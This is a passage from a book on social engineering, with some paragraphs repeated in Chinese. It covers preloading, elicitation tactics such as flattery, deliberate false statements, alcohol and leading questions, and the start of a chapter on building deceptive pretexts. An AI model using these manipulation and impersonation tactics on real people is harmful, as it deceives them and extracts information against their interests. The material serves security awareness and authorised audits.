Whatever methods you choose to use, you can take certain steps to have the upper edge. One of these steps is called preloading.

Preloading

You stand in line to buy your $10 movie ticket and are barraged with sensory overload of posters of upcoming movies. You stand in line to buy your $40 worth of popcorn and drinks, see more posters, and then you push your way through to get a seat. Finally, when the movie starts you are presented with a series of clips about upcoming movies. Sometimes these movies aren’t even in production yet, but the announcer comes on and says, “The funniest movie since…” or the music starts with an ominous tone, a dense fog fills the screen, and the voiceover intones, “You thought it was over in Teenage Killer Part 45….”

Whatever the movie is, the marketers are telling you how to feel—in other words, preloading what you should be thinking about this movie—before the preview starts. Then the short 1–3 minutes they have to show you what the movie is about are spent showing you clips to entice your desire to see the movie and to appeal to the crowd that wants the comedy, horror, or love story.

Not much has been written about preloading, but it is a very serious topic. Preloading denotes that you can do just what it says—preload targets with information or ideas on how you want them to react to certain information. Preloading is often used in marketing messages; for example, in the national restaurant chain ads that show beautiful people laughing and enjoying the meal that looks so beautiful and perfect. As they say “yummm!” and “ohhh!” you can almost taste the food.

Of course, as a social engineer you can’t run a commercial for your targets, so how can you use preloading?

As with much in the social engineering world, you have to start from the end results and work backward. What is your goal? You might have the standard elicitation goal of gaining information from a target on a project she is working on, or dates she will be in the office or on vacation. Whatever it is, you must set the goal first. Next you decide the type of questions that you want to ask, and then decide what type of information can preload a person to want to answer those questions.

For example, if you know that later tonight you want to go to a steak place that your coupon-loving wife doesn’t really enjoy, but you are in the mood for a rib eye, you can preload to get a response that may be in your favor. Maybe earlier in the day you can say something like, “Honey, you know what I am in the mood for? A big, juicy, grilled steak. The other day I was driving to the post office and Fred down the road had his grill out. He had just started cooking the steaks on charcoal and the smell came in the car window and it has been haunting me ever since.” Whether this elicits a response at this exact moment is not important; what you did is plant a seed that touched every sense. You made her imagine the steaks sizzling on the grill, talked about seeing them go on, talked about smelling the smoke, and about how much you wanted one.

Suppose then you bring home the paper and as you’re going through it you see an ad with a coupon for the restaurant you want to go to. You simply leave that page folded on the table. Again, maybe your wife sees it or maybe she doesn’t, but chances are that because you left it with the mail, because you mentioned steak, and because she loves coupons she will see the coupon left on the table.

Now later on she comes to you and says, “What do you want for dinner tonight?” Here is where all your preloading comes in—you mentioned the smell, sight, and desire for steak. You left an easy-to-find coupon on the table for the steak restaurant of choice and now it is dinner discussion time. You answer her with, “Instead of making you cook and having a mess to clean up tonight, we haven’t been to XYZ Steaks in a while. What if we just hit that place tonight?”

Knowing she doesn’t like that place, all you can hope is that the preloading is working. She responds, “I saw a coupon for that place in the newspaper. It had a buy one meal, get a second half off. But you know I don’t like….”

As she is speaking you can jump in and offer praise: “Ha! Coupon queen strikes again. Heck, I know you don’t like steak too much but I hear from Sally that they have awesome chicken meals there, too.”

A few minutes later you are on the way to steak heaven. Whereas a frontal assault stating your desire to go to XYZ would have most likely met with a resounding “No!”, preloading helped set her mind up to accept your input, and it worked.

One other really simplistic example before moving on: A friend walks up and says, “I have to tell you a really funny story.” What happens to you? You might even start smiling before the story starts and your anticipation is to hear something funny, so you look and wait for opportunities to laugh. He preloaded you and you anticipated the humor.

How do these principles work within the social engineering world?

Preloading is a skill in itself. Being able to plant ideas or thoughts in a way that is not obvious or overbearing sometimes takes more skill than the elicitation itself. Other times, depending on the goal, preloading can be quite complex. The earlier steak scenario is a complex problem: the preload took some time and energy, whereas a simplistic preload might be something as simple as finding out what kind of car they drive or some other innocuous piece of information. In a very casual conversation where you “happen” to be in the same deli at the same time as your target, you might start a casual conversation with something like, “Man, I love my Toyota. This guy in a Chevy just backed into me in the parking lot, not even a scratch.” With any luck, as you engage the target in conversation, your exclamation about your car might warm him up to the questions that you can then place about types of cars or other topics you want to gather intel on.

The topic of preloading makes more sense as you start to analyze how you can utilize elicitation. Social engineers have been mastering this skill for as long as social engineering has been around. Many times the social engineer realizes he has this skill way before he turns to a life of social engineering. As a youth or a young adult he finds interacting with people easy, and later finds that he gravitates toward employment that uses these skills. Maybe he is the center of his group of friends and people seem to tell him all their problems and have no problem talking to him about everything. He realizes later that these skills are what gets him through doors that might be closed otherwise.

When I was young I always had this talent. My parents would tell me stories of how, at five or six years old, I would strike up conversations with complete strangers, sometimes even walking into the kitchen of busy restaurants to ask questions about our order or inquire how things were being done. Somehow I got away with it—why? Probably because I didn’t know this behavior wasn’t acceptable and because I did it with confidence. As I got older, that skill (or a lack of fear) came into full effect.

It also seemed that people, sometimes even complete strangers, loved to tell me their problems and talk to me about things. One story that I think shows how I was able to utilize not only preloading but also good elicitation skills took place when I was around 17 or 18 years old.

I was an avid surfer and would do odd jobs to support my hobby—basically anything from pizza delivery to fiberglass cutter to lifeguard. One time I ran errands for my father, who owned an accounting/financial consulting company. I would deliver papers to his clients, get signatures, and bring them back. Often, many of the clients would open up and tell me all about their lives, their divorces, and their business successes and failures. Usually this started with a small session with them telling me how great my Dad was to them. At the time I never understood why people, especially adults, would open up to a 17- or 18-year-old with the reasons their universe is breaking apart.

One particular client I would visit often owned an apartment complex. It was nothing huge and fancy; he just had a few properties that he owned and managed. This poor guy had real problems—family problems, health problems, and personal problems—all of which he routinely would tell me about for as long as I would sit and listen. This is when it began to hit me that I could get away with saying or doing amazing things if I just spent time listening to people. It made them feel important and like I was a good person. It didn’t matter if I sat there thinking about my next great wave; what mattered was that I listened.

Normally I would listen for as long as I could stand the amazing amount of tobacco smoke he put out (he smoked more than any person I have ever seen in my life). But I would sit and listen, and because I was young and had no experience I would offer no advice, no solution, just an ear. The thing was that I was truly concerned; I didn’t fake it. I wished I had a solution. One day he told me about how he wanted to move back out West where his daughter was and be closer to family.

I wanted to move on in life and get a job I thought would be cool, fun, and give me some more cash for surfboards and other things I “needed.” During one of my listening sessions, a crazy idea popped in my head, and he viewed me as a responsible, compassionate young man with a “good head” on my shoulders. The preloading took place over the months I spent sitting with him and listening. Now it was time to cash in on that. I said, “Why don’t you go back and let me run your apartment complex for you?” The idea was so absurd, so ridiculous that looking back now I would have laughed in my face. But for weeks, months even, I had listened to his problems. I knew the man and his woes. On top of that, I never laughed at or rejected him. Now he had shared a problem with me, and here was a perfect solution, one that took care of all of his problems as well as mine. My income needs were low, and he wanted to be close to his family. We had built a relationship over the last few months and thus he “knew” me and trusted me.

After some discussion we came to an agreement, and he up and moved back out West and I was a 17-year-old running a 30-unit apartment complex as the vice-landlord. I could go on and tell you much more about this story, but the point is already made. (I will tell you the job went great until he asked me to try to sell his complex for him, which I did in record time, at the same time selling myself out of a job.)

The point is that I developed a rapport, a trust, with someone and without trying and without malicious intent, I had a chance to preload him over months with the ideas that I was kind and compassionate and intelligent. Then when the time arose I was able to present an absurd idea, and because of the months of preloading, it was accepted.

It wasn’t until later in life that it hit me what was going on here. There were so many factors at play that I didn’t realize at the time. Preloading from a social engineering standpoint involves knowing your goal before you start. In this case, I didn’t know I was going to try and land a crazy job with this guy. But preloading still worked.

In most social engineering cases it would be much quicker, but I think the principles apply. Being as genuine as you can is essential. Because preloading involves the person’s emotions and senses, give them no reason to doubt. The question you ask should match your pretext. For preloading to work you have to ask for something that matches the belief you built into them. For example, if my offer had been to go visit my client’s family and take pictures rather than manage his apartment complex, it wouldn’t have matched the belief system he had of me, namely that I was a smart, business-minded, caring young man. Finally, the offer, when made, must be of benefit to the target, or at least perceived as a benefit. In my case, there was lots of benefit to my client. But in social engineering the benefit can be as little as “bragging rights”: giving the person a platform to brag a bit. Or the benefit can be much more and involve physical, monetary, or psychological benefits.

Practicing elicitation and becoming proficient at it will make you a master social engineer. Logically, the next section is how to become a successful elicitor.

Becoming a Successful Elicitor

Analyzing just my own experiences I can identify some key components that led to my success from five years old to now:

  • A lack of fear to talk to people and be in situations that are not considered “normal.”
  • I truly do care for people, even if I don’t know them. I want to and enjoy listening to people.
  • I offer advice or help only when I have a real solution.
  • I offer a non-judgmental ear for people to talk about their problems.

These are key elements to successful elicitation. The United States Department of Homeland Security (DHS) has an internal pamphlet on elicitation it hands out to its agents that I was able to obtain and archive at www.social-engineer.org/wiki/archives/BlogPosts/ocso-elicitation-brochure.pdf.

This brochure contains some excellent pointers. Basically, as stated in it and in this chapter, elicitation is used because it works, is very hard to detect, and is non-threatening. The DHS pamphlet approaches elicitation from a “how to avoid” point of view, but the following sections take some of the scenarios and show you what can be learned.

Appealing to Someone’s Ego

The scenario painted in the DHS brochure goes like this:

Attacker: “You must have an important job; so and so seems to think very highly of you.”

Target: “Thank you, that is nice of you to say, but my job isn’t that important. All I do here is…”

The method of appealing to someone’s ego is simplistic but effective. One caution, though: stroking someone’s ego is a powerful tool, but if you overdo it or do it without sincerity it just turns people off. You don’t want to come off as a crazy stalker: “Wow, you are the most important person in the universe and you are so amazing-looking, too.” Saying something like that might get security called on you.

Using ego appeals needs to be done subtly, and if you are talking to a true narcissist, avoid eye rolls, sighs, or argumentativeness when she brags of her accomplishments. Subtle ego appeals are things like, “That research you did really changed a lot of people’s viewpoints on…” or “I overheard Mr. Smith telling that group over there that you are one of the keenest data analysts he has.” Don’t make the approach so over the top that it is obvious.

As stated in the DHS brochure, subtle flattery can coax a person into a conversation that might otherwise never have taken place, and that is exactly what you want as a social engineer.

Expressing a Mutual Interest

Consider this mock scenario:

Attacker: “Wow, you have a background in ISO 9001 compliance databases? You should see the model we built for a reporting engine to assist with that certification. I can get you a copy.”

Target: “I would love to see that. We have been toying with the idea of adding a reporting engine to our system.”

Expressing mutual interest is an important aspect of elicitation. This particular scenario is even more powerful than appealing to someone’s ego because it extends the relationship beyond the initial conversation. The target agreed to further contact, to accept software from the attacker, and expressed interest in discussing plans for the company’s software in the future. All of this can lead to a massive breach in security.

The danger in this situation is that now the attacker has full control. He controls the next steps: what information is sent, how much, and when it is released. This is a very powerful move for the social engineer. Of course, if the engagement were long-term, then having a literal piece of software that can be shared would prove even more advantageous. Sharing usable and non-malicious software would build trust, build rapport, and give the target a sense of obligation.

Making a Deliberate False Statement

Delivering a false statement seems like it would backfire right from the start, but it can prove to be a powerful force to be reckoned with.

Attacker: “Everybody knows that XYZ Company produced the highest-selling software for this widget on earth.”

Target: “Actually, that isn’t true. Our company started selling a similar product in 1998 and our sales records have beaten them routinely by more than 23%.”

These statements, if used effectively, can elicit a response from the target that contains real facts. Most people feel they must correct wrong statements when they hear them. It’s almost as if they are challenged to prove they are correct. The desire to inform others, appear knowledgeable, and be intolerant of misstatements seems to be built into human nature. Understanding this trait can make this scenario a powerful one. You can use this method to pull out full details from the target about real facts and also to discern who in a group might have the most knowledge about a topic.

Volunteering Information

The DHS brochure makes a good point about a personality trait many of us have. A few mentions of it have appeared in the book already, and it’s covered in much more detail later on, but obligation is a strong force. As a social engineer, offering up information in a conversation almost compels the target to reply with equally useful information.

Want to try this one out? Next time you are with your friends say something like, “Did you hear about Ruth? I heard she just got laid off from work and is having serious problems finding more work.”

Most of the time you will get, “Wow, I didn’t hear that. That is terrible news. I heard that Joe is getting divorced and they are going to lose the house, too.”

A sad aspect of humanity is that we tend to live the saying “misery loves company”—how true it is in this case. People tend to want to share similar news. Social engineers can utilize this proclivity to set the tone or mood of a conversation and build a sense of obligation.

Assuming Knowledge

Another powerful manipulation tool is that of assumed knowledge. It is commonplace to assume that if someone has knowledge of a particular situation, it’s acceptable to discuss it with them. An attacker can deliberately exploit this trait by presenting information as if he is in the know and then using elicitation to build a conversation around it. He then can regurgitate the information as if it were his own and continue to build the illusion that he has intimate knowledge of this topic. This scenario might be better illustrated with an example.

 

有一次,我去中国就一些材料进行大宗谈判。在谈判中,我需要对目标公司有深入的了解,因此必须在与他们会面之前找到获得这些信息的方法。我们从未见过面,但在谈判开始之前,我正前往中国参加一个会议。在会议上,我偶然听到了一段关于如何在与中国人谈判时将自己置于更高位置的对话。

One time I was going to China to negotiate a large deal on some materials. I needed to have some intimate knowledge about my target company in the negotiations and had to find a way to get it before I met with them. We had never met face to face but I was heading to a conference in China before my negotiations started. While at the conference I happened to overhear a conversation starting about how to place yourself in a higher position when dealing with the Chinese on negotiations.

 

我知道这是我的机会,而让情况更加甜蜜的是,小组中的一个人来自我将要会见的公司。我迅速加入谈话,我知道如果我不迅速说点什么,我会丢脸。我的知识有限,但他们不需要知道这一点。当出现短暂的停顿时,我开始谈论“关系”理论。关系基本上就是两个社会地位可能不同的人如何建立联系,然后其中一个人被迫为另一个人做点好事。我谈到了如何使用这种联系,然后总结道,作为一个美国人,不要只是拿一张名片塞进我的后口袋,而是要查看它、评论它,然后把它放在一个受人尊敬的地方,这一点非常重要。

I knew this was my opportunity, and to make the situation even sweeter one of the people in the small group was from the company I was going to be meeting with. I quickly injected myself into the conversation and knew that if I didn’t say something quick I would lose face. My knowledge was limited but they didn’t need to know that. When a small pause arose I began to talk about the Guanxi theory. Guanxi is basically how two people who may not have the same social status can become connected, and then one is pressed upon to perform a favor for the other. I talked about how this connection can be used, and then concluded by tying it in with how important it is as an American to not simply take a business card and stick it in my back pocket but to review it, comment on it, then place it somewhere respectful.

 

这次谈话足以让我成为一位有一定知识、值得留在信任圈的人。现在我已经建立了自己的知识基础,我坐下来听每个人分享他们关于如何与大型中国公司进行适当谈判的经验和个人知识。当我的目标公司员工发言时,我非常仔细和特别注意。在他讲话时,我可以看出他给出的“建议”与他公司的经营理念密切相关。这些知识比我能买到的任何东西都更有价值,这让我的旅行非常成功。

This conversation was enough to set me up as someone who had some knowledge and deserved to stay in the circle of trust there. Now that I had established my knowledge base I sat back and listened to each person express his or her experience and personal knowledge on how to negotiate properly with large Chinese companies. I paid very close and particular attention when the gentlemen who worked for my target company spoke. As he talked I could tell the “tips” he was giving were closely linked to the business philosophies of his company. This knowledge was more valuable than anything I could have paid for and it led to a very successful trip.

 

我觉得还有几个场景在引出过程中经常使用。

There are a couple more scenarios I feel are often used in elicitations.

 

利用酒精的作用

Using the Effects of Alcohol

Nothing loosens lips more than the juice. This is an unfortunate but true fact. Mix any one of the preceding five scenarios with alcohol and you can magnify its effects by 10.

Probably the best way to describe this scenario is with a true story.

In 1980 a senior scientist from Los Alamos National Laboratory traveled to a research institute in the People’s Republic of China (PRC) to talk about his specialty, nuclear fusion. He had extensive knowledge of U.S. nuclear weapons information but knew the situation he was entering was dangerous and he needed to be determined to stick to his topic.

Yet he was constantly barraged with increasingly detailed inquiries directly related to nuclear weapons. The attackers’ tactics would change and they would ask many benign questions about fusion and astrophysics, his specialty.

Once they even threw a cocktail party in his honor. They gathered around and applauded his knowledge and research—each time with a toast and a drink. They began to inquire about classified matters such as the ignition conditions of deuterium and tritium, the two components in the then-new neutron bomb. He did well at fending off the constant questions, but after many toasts and a party in his honor, he decided to give an analogy. He mused to the group that if you rolled those two components into a ball and then rolled them off the table they would most likely ignite because they had such low temperature threshold levels.

This seemingly useless story and information most likely caused the researchers in China to discern a clear path of research on nuclear weapons. They would take this information to yet another scientist and, now armed with a little more knowledge, use it to get to the next stage with him or her. After many attempts, it is very likely the Chinese scientists would possess a clear picture of what path to take.

This is a serious example of how using elicitation can lead to gaining a clear picture of the whole answer. In social engineering it may be the same for you. All the answers might not come from one source. You may elicit some information from one person about their whereabouts on a particular date, and then use that information to elicit more information from the next stage, and so on and so forth. Putting those nuggets of information together is often the hard part of perfecting elicitation skills. That is discussed next.

Using Intelligent Questions

As a social engineer you must realize that the goal with elicitation is not to walk up and say, “What is the password to your servers?”

The goal is getting small and seemingly useless bits of information that help build a clear picture of the answers you are seeking or the path to gaining those answers. Either way, this type of information gathering can help give the social engineer a very clear path to the target goal.

How do you know what type of questions to use?

The following sections analyze the types of questions that exist and how a social engineer can use them.

Open-Ended Questions

Open-ended questions cannot be answered with yes or no. Asking, “Pretty cold out today, huh?” will lead to a “Yes,” “Uh-huh,” “Yep,” or some other similar affirmative guttural utterance, whereas asking, “What do you think of the weather today?” will elicit a real response: the person must answer with more than a yes or no.

One way a social engineer can learn about how to use open-ended questions is to analyze and study good reporters. A good reporter must use open-ended questions to continue eliciting responses from his or her interviewee.

Suppose I had plans to meet a friend and he canceled, and I wanted to know why. I can ask a question like, “I was curious about what happened to our plans the other night.”

“I wasn’t feeling too well.”

“Oh, I hope you are better now. What was wrong?”

This line of questioning usually gets more results than doing an all-out assault on the person and saying something like, “What the heck, man? You ditched me the other night!”

Another aspect of open-ended questions that adds power is the use of why and how. Following up a question with how or why can lead to a much more in-depth explanation of what you were originally asking.

This question again cannot be answered with a “yes” or “no,” and the person will reveal other details you may find interesting.

Sometimes open-ended questions can meet with some resistance, so using the pyramid approach might be good. The pyramid approach is where you start with narrow questions and then ask broader questions at the end of the line of questioning. If you really want to get great at this technique, learn to use it with teenagers.

For example, many times open-ended questions such as, “How was school today?” will be met with an “OK” and nothing more, so asking a narrow question might open up the flow of information better.

“What are you doing in math this year?” This question is very narrow and can be answered only with a very specific answer: “Algebra II.”

“Ah, I always hated that. How do you like it?”

From there you can always branch out into broader questions, and after you get the target talking, getting more info generally becomes easier.

Closed-Ended Questions

Obviously, closed-ended questions are the opposite of open-ended questions but are a very effective way to lead a target where you want. Closed-ended questions often cannot be answered with more than one or two possibilities.

In an open-ended question one might ask, “What is your relationship with your manager?” but a closed-ended question might be worded, “Is your relationship with your manager good?”

Detailed information is usually not the goal with closed-ended questions; rather, leading the target is the goal.

Law enforcement and attorneys use this type of reasoning often. If they want to lead their target down a particular path they ask very closed questions that do not allow for freedom of answers. Something like this:

“Do you know the defendant, Mr. Smith?”

“Yes, I do.”

“On the night of June 14th, did you see Mr. Smith at the ABC Tavern?”

“I did.”

“And at what time was that?”

“11:45pm.”

All of these questions are very closed ended and only allow for one or two types of responses.

Leading Questions

Combining aspects from both open- and closed-ended questions, leading questions are open ended with a hint leading toward the answer. Something like, “You were at the ABC Tavern with Mr. Smith on June 14th at around 11:45pm, weren’t you?” This type of question leads the target where you want but also offers him the opportunity to express his views, but very narrowly. It also preloads the target with the idea that you have knowledge of the events being asked about.

Leading questions often can be answered with a yes or no but are different from closed-ended questions because more information is planted in the question that, when answered, gives the social engineer more information to work with. Leading questions state some facts and then ask the target to agree or disagree with them.

In 1932 the British psychologist Frederic C. Bartlett concluded a study on reconstructive memory. He told subjects a story and then asked them to recall the facts immediately, two weeks later, and then four weeks later. Bartlett found that subjects modified the story based on their culture and beliefs as well as personality. None were able to recall the story accurately and in its entirety. It was determined that memories are not accurate records of our past. It seems that humans try to make the memory fit into our existing representations of the world. When asked questions, many times we respond from memory based on our perceptions and what is important to us.

Because of this, asking people a leading question and manipulating their memory is possible. Elizabeth Loftus, a leading figure in the field of eyewitness testimony research, has demonstrated through the use of leading questions how distorting a person’s memory of an event is easily possible. For example, if you showed a person a picture of a child’s room that contained no teddy bear, and then asked her, “Did you see a teddy bear?” you are not implying that one was in the room, and the person is free to answer yes or no as they wish. However, asking, “Did you see the teddy bear?” implies that one was in the room and the person is more likely to answer “yes,” because the presence of a teddy bear is consistent with that person’s schema of a child’s room.

Because of this research the use of leading questions can be a powerful tool in the hands of a skilled social engineer. Learning how to lead the target can also enhance a social engineer’s ability to gather information.

Assumptive Questions

Assumptive questions are just what they sound like—where you assume that certain knowledge is already in the possession of the target. The way a social engineer can determine whether or not a target possesses the information he is after is by asking an assumptive question.

For example, one skill employed by law enforcement is to assume the target already has knowledge—for example, of a person—and ask something like, “Where does Mr. Smith live?” Depending on the answer given, the officer can determine whether the target knows the person and how much she knows about him.

A good point to note is that when a social engineer uses assumptive questions the whole picture should never be given to the target. Doing so gives all the power to the target and removes much of the social engineer’s ability to control the environment. The social engineer never wants to use assumptive questions to accuse the target of a wrong. Doing so alienates the target and again costs the social engineer power.

A social engineer should use assumptive questions when he has some idea of the real facts he can use in the question. Using an assumptive question with bogus information may turn the target off and will only confirm that the target doesn’t know about something that didn’t happen. Back to an earlier example, if I wanted to gain information from a leading chemist and I did some research and knew enough to formulate one intelligent sentence, I could make an assumptive question, but it would ruin future follow-up if I was not able to back up the assumption the target would make of my knowledge.

For example, suppose I were to ask, “Because deuterium and tritium have such low temperature thresholds, how does one handle these materials to avoid ignition?” The follow-up information might be hard to follow if I am not a nuclear physicist. This is counterproductive and not too useful. Plan your assumptive questions to have the maximum effect.

One adjunct that is taught to law enforcement officials that comes in very handy when using assumptive questions is to say, “Now think carefully before you answer the next question…” This kind of a statement preloads the target’s mind with the idea that he must be truthful with his next statement.

It can take months or years to master these skills. Don’t get disheartened if the first few attempts are not successful, and keep trying. Don’t fear, though; there are some tips to mastering this skill. I will review these in closing.

Mastering Elicitation

This chapter has a lot of information for you to absorb, and if you are not a people person, employing the techniques covered might seem like a daunting task. Like most aspects of social engineering, elicitation has a set of principles that when applied will enhance your skill level. To help you master these principles, remember these pointers:

  • Too many questions can shut down the target. Peppering the target with a barrage of questions will do nothing but turn off the target. Remember, conversation is a give and take. You want to ask, but you have to give to make the target feel at ease.
  • Too few questions will make the target feel uncomfortable. Have you ever been in a conversation that is filled with “awkward silences”? It isn’t good, is it? Don’t assume that your target is a skilled and willing conversationalist. You must work at making a conversation an enjoyable experience.
  • Ask only one question at a time. Chapter 5 covers buffer overflows on the human mind, but at this time your goal is not to overflow the target. It is to merely gather information and build a profile. To do this you can’t seem too eager or uninterested.

As you have probably gathered, making elicitation work right is a delicate balance. Too much, too little, too much at once, not enough—any one of them will kill your chances at success.

However, these principles can help you master this amazing talent. Whether you use this method for social engineering or just learning how to interact with people, try this: Think of conversation as a funnel, where on the top is the largest, most “neutral” part and at the bottom is the very narrow, direct ending.

Start by asking the target very neutral questions, and gather some intel using these questions. Give and take in your conversation, and then move to a few open-ended questions. If needed, use a few closed-ended questions to direct the target to where you want to go and then, if the situation fits, move to highly directed questions as you reach the end of the funnel. What will pour out of the “spout” of that funnel is a river of information.

Think about the situation discussed earlier in this chapter, with my target at the chamber of commerce gathering. My goal was to gather intel on anything that might lead to a security breach.

I started off the conversation with a very neutral question. “Escaping the vultures?” This question broke the ice on the conversation as well as used a little humor to create a bridge that allowed us to exist on the same plane of thought. I asked a few more neutral questions and handed him my card while inquiring what he does. This segued smoothly into the open-ended questions.

A brief information-gathering session that occurred earlier, using carefully placed closed-ended or assumptive questions, was key. After hearing about the company’s recent purchase of new accounting software and network upgrades I wanted to go in for the kill. Having scoped out the building I knew it used RFID, but I wasn’t sure if the target would go so far as to describe the card and show it to me.

This is where the use of direct questions played a role: coming right out and asking what security the company used. By the time I used that type of question our rapport and trust factor was so high he probably would have answered any questions I asked.

Understanding how to communicate with people is an essential skill for an elicitor. The social engineer must be adaptive and able to match the conversation to his or her environment and situation. Quickly building even the smallest amount of trust with the target is crucial. Without that rapport, the conversation will most likely fail.

Other key factors include making sure that your communication style, the questions used, and the manner in which you speak all match your pretext. Knowing how to ask questions that force a response is a key to successful elicitation, but if all that skill and all those questions do not match your pretext then the elicitation attempt will most surely fail.

Summary

This chapter covered some of the most powerful points in this whole book—powerful in the sense that applying them can change not only your social engineering abilities but also your abilities as a communicator. Knowing how to ask the right questions in the right tense and the right manner can open so many opportunities. As a social engineer, this is what separates success from failure. First impressions are based initially on sight, but what comes out of your mouth first can make or break the deal. Mastering elicitation can almost guarantee success as a social engineer and can add serious weight to any pretext you decide to use.

Throughout this chapter I mentioned the power of pretexting. This is another topic that every social engineer, both malicious and professional, must master. But how can you ensure you accomplish this goal? To answer this you must learn about pretexting and understand exactly what it is, as discussed in Chapter 4.

Chapter 4

Pretexting: How to Become Anyone

Honesty is the key to a relationship. If you can fake that, you’re in.

—Richard Jeni

At times we probably all wish we could be someone else. Heck, I would love to be a little skinnier and better looking. Even though medical science hasn’t come up with a pill that can make that possible, a solution to this dilemma does exist—it’s called pretexting.

What is pretexting? Some people say it is just a story or lie that you will act out during a social engineering engagement, but that definition is very limiting. Pretexting is better defined as the background story, dress, grooming, personality, and attitude that make up the character you will be for the social engineering audit. Pretexting encompasses everything you would imagine that person to be. The more solid the pretext, the more believable you will be as a social engineer. Often, the simpler your pretext, the better off you are.

Pretexting, especially since the advent of the Internet, has seen an increase in malicious uses. I once saw a t-shirt that read, “The Internet: Where men are men, women are men, and children are FBI agents waiting to get you.” As slightly humorous as that saying is, it has a lot of truth in it. On the Internet you can be anyone you want to be. Malicious hackers have been using this ability to their advantage for years, and not just with the Internet.

In social engineering, playing a role or being a different person to successfully accomplish the goal is often imperative. Chris Hadnagy might not have as much pull as the tech support guy or the CEO of a major importing organization. When a social engineering situation arises, having the skills needed to become the pretext is important. In a discussion I was having on this topic with world-renowned social engineer Chris Nickerson, he said something I think really hits home.

Nickerson stated that pretexting is not about acting out a role or playing a part. He said it is not about living a lie, but actually becoming that person. You are, in every fiber of your being, the person you are portraying. The way he walks, the way he talks, body language—you become that person. I agree with this philosophy on pretexting. Often when people watch a movie, the ones we feel are the “best we have ever seen” are those where the actors get us so enthralled with their parts that we can’t separate them from their portrayed characters.

This was proven true to me when many years ago my wife and I watched a great movie with Brad Pitt, Legends of the Fall. He was a selfish jerk in this movie, a tormented soul who made a lot of bad decisions. He was so good at playing this part my wife literally hated him as an actor for a few years. That is a good pretexter.

The problem with using pretexting for many social engineers is that they feel it is just dressing up as a part and that’s it. True, the dress can help, but pretexting is a science. In a way, your whole persona is going to portray you in a light that is different than who you are. To do this, you, as a social engineer, must have a clear picture of what pretexting really is. Then you can plan out and perform the pretext perfectly. Finally, you can apply the finishing touches. This chapter will cover those aspects of pretexting. First is a discussion of what pretexting really is. Following that is a discussion of how to use pretexting as a social engineer. Finally, to tie it all together, this chapter explores some stories that show how to use pretexting effectively.

What Is Pretexting?

 

借口是指创造虚构的场景,以说服目标受害者泄露信息或采取某些行动。这不仅仅是编造谎言;在某些情况下,它可以创造一个全新的身份,然后使用该身份操纵信息的接收。社会工程师可以使用借口冒充他们自己从未做过的某些工作和角色。借口并不是一劳永逸的解决方案。社会工程师在其职业生涯中必须想出许多不同的借口。所有这些借口都有一个共同点:研究。良好的信息收集技巧可以成就或毁掉一个好的借口。例如,如果您的目标不使用外部支持,模仿完美的技术支持代表是没用的。

Pretexting is defined as the act of creating an invented scenario to persuade a targeted victim to release information or perform some action. It is more than just creating a lie; in some cases it can be creating a whole new identity and then using that identity to manipulate the receipt of information. Social engineers can use pretexting to impersonate people in certain jobs and roles that they never themselves have done. Pretexting is not a one-size-fits-all solution. A social engineer must develop many different pretexts over his or her career. All of them will have one thing in common: research. Good information gathering techniques can make or break a good pretext. For example, mimicking the perfect tech support rep is useless if your target does not use outside support.

 

除了社会工程学,借口还用于其他生活领域。销售、公开演讲、所谓的算命师、神经语言程序设计 (NLP) 专家,甚至医生、律师、治疗师等都必须使用某种借口。他们都必须创造一种情景,让人们愿意透露他们通常不会透露的信息。使用借口的社会工程师和其他人的差别在于所涉及的目标。同样,社会工程师必须扮演这种角色一段时间,而不仅仅是扮演一个角色。

Pretexting is also used in areas of life other than social engineering. Sales; public speaking; so-called fortune tellers; neurolinguistic programming (NLP) experts; and even doctors, lawyers, therapists, and the like all have to use a form of pretexting. They all have to create a scenario where people are comfortable with releasing information they normally would not. The difference in social engineers using pretexting and others is the goals involved. A social engineer, again, must live that persona for a time, not just act a part.

 

只要审计或社会工程工作还在进行,你就需要保持角色的本色。我自己也会“进入角色”,我的许多同事也是如此,有些人甚至在“下班后”也保持角色的本色。无论何时何地,你都应该成为你设定的借口。此外,许多专业的社会工程师拥有许多不同的在线、社交媒体、电子邮件和其他账户,以支持一系列借口。

As long as the audit or social engineering gig lasts, you need to be in the persona. I “get in character” myself, as do many of my colleagues, some of whom even stay in character “off the clock.” Anywhere you need to, you should be the pretext you set out to be. In addition, many professional social engineers have many different online, social media, email, and other accounts to back up a slew of pretexts.

 

我曾就这个话题采访过电台偶像汤姆·米什克,这是我参与的一个社会工程播客节目(主办方为www.social-engineer.org/episode-002-pretexting-not-just-for-social-engineers/)。电台主持人必须精通伪装,因为他们必须不断向公众发布他们想要的信息。汤姆在这方面非常熟练,以至于许多听众都觉得他们“认识”他是朋友。他会收到婚礼、周年纪念甚至生日的邀请。汤姆是如何做到这种惊人的伪装的?

I once interviewed radio icon Tom Mischke on this topic for a social engineering podcast I am a part of (hosted at www.social-engineer.org/episode-002-pretexting-not-just-for-social-engineers/). Radio hosts must be proficient at pretexting because they constantly have to release only the information they want to the public. Tom was so proficient at this that many listeners felt as if they “knew” him as a friend. He would get invitations to weddings, anniversaries, and even births. How was Tom able to accomplish this amazing kind of pretext?

The answer is practice. Lots and lots of practice is what he prescribed. He told me that he would actually plan out his “acts” then practice them—use the voice they would have, sit how they would sit, maybe even dress like they would dress. Practice is exactly what makes a good pretext.

A very important aspect to remember is that the quality of the pretext is directly linked to the quality of the information gathered. The more information you have, and the better and more relevant it is, the easier it will be to develop a pretext that succeeds. For example, the classic pretext of a tech support guy would utterly fail if you went to a company that either had internal support or outsourced it to a very small company of one or two people. Applying your pretext should be as easy and natural as conversing with someone about who you really are.

So that you can see how you can utilize this skill, the following section covers the principles of pretexting then shows how you can apply them to actually planning a solid pretext.

The Principles and Planning Stages of Pretexting

As with every skill, certain principles dictate the steps to performing that task. Pretexting is no different. The following is a list of principles of pretexting that you can use. By no means are these the only principles out there; maybe others can be added, but these principles embody the essence of pretexting:

  • The more research you do the better the chance of success.
  • Involving your own personal interests will increase success.
  • Practice dialects or expressions.
  • Many times the social engineering effort is reduced when the phone is viewed as less important. But as a social engineer, using the phone should not reduce the effort you put into the social engineering gig.
  • The simpler the pretext the better the chance of success.
  • The pretext should appear spontaneous.
  • Provide a logical conclusion or follow through for the target.

The following sections discuss each of these principles in detail.

The More Research You Do, the Better the Chance of Success

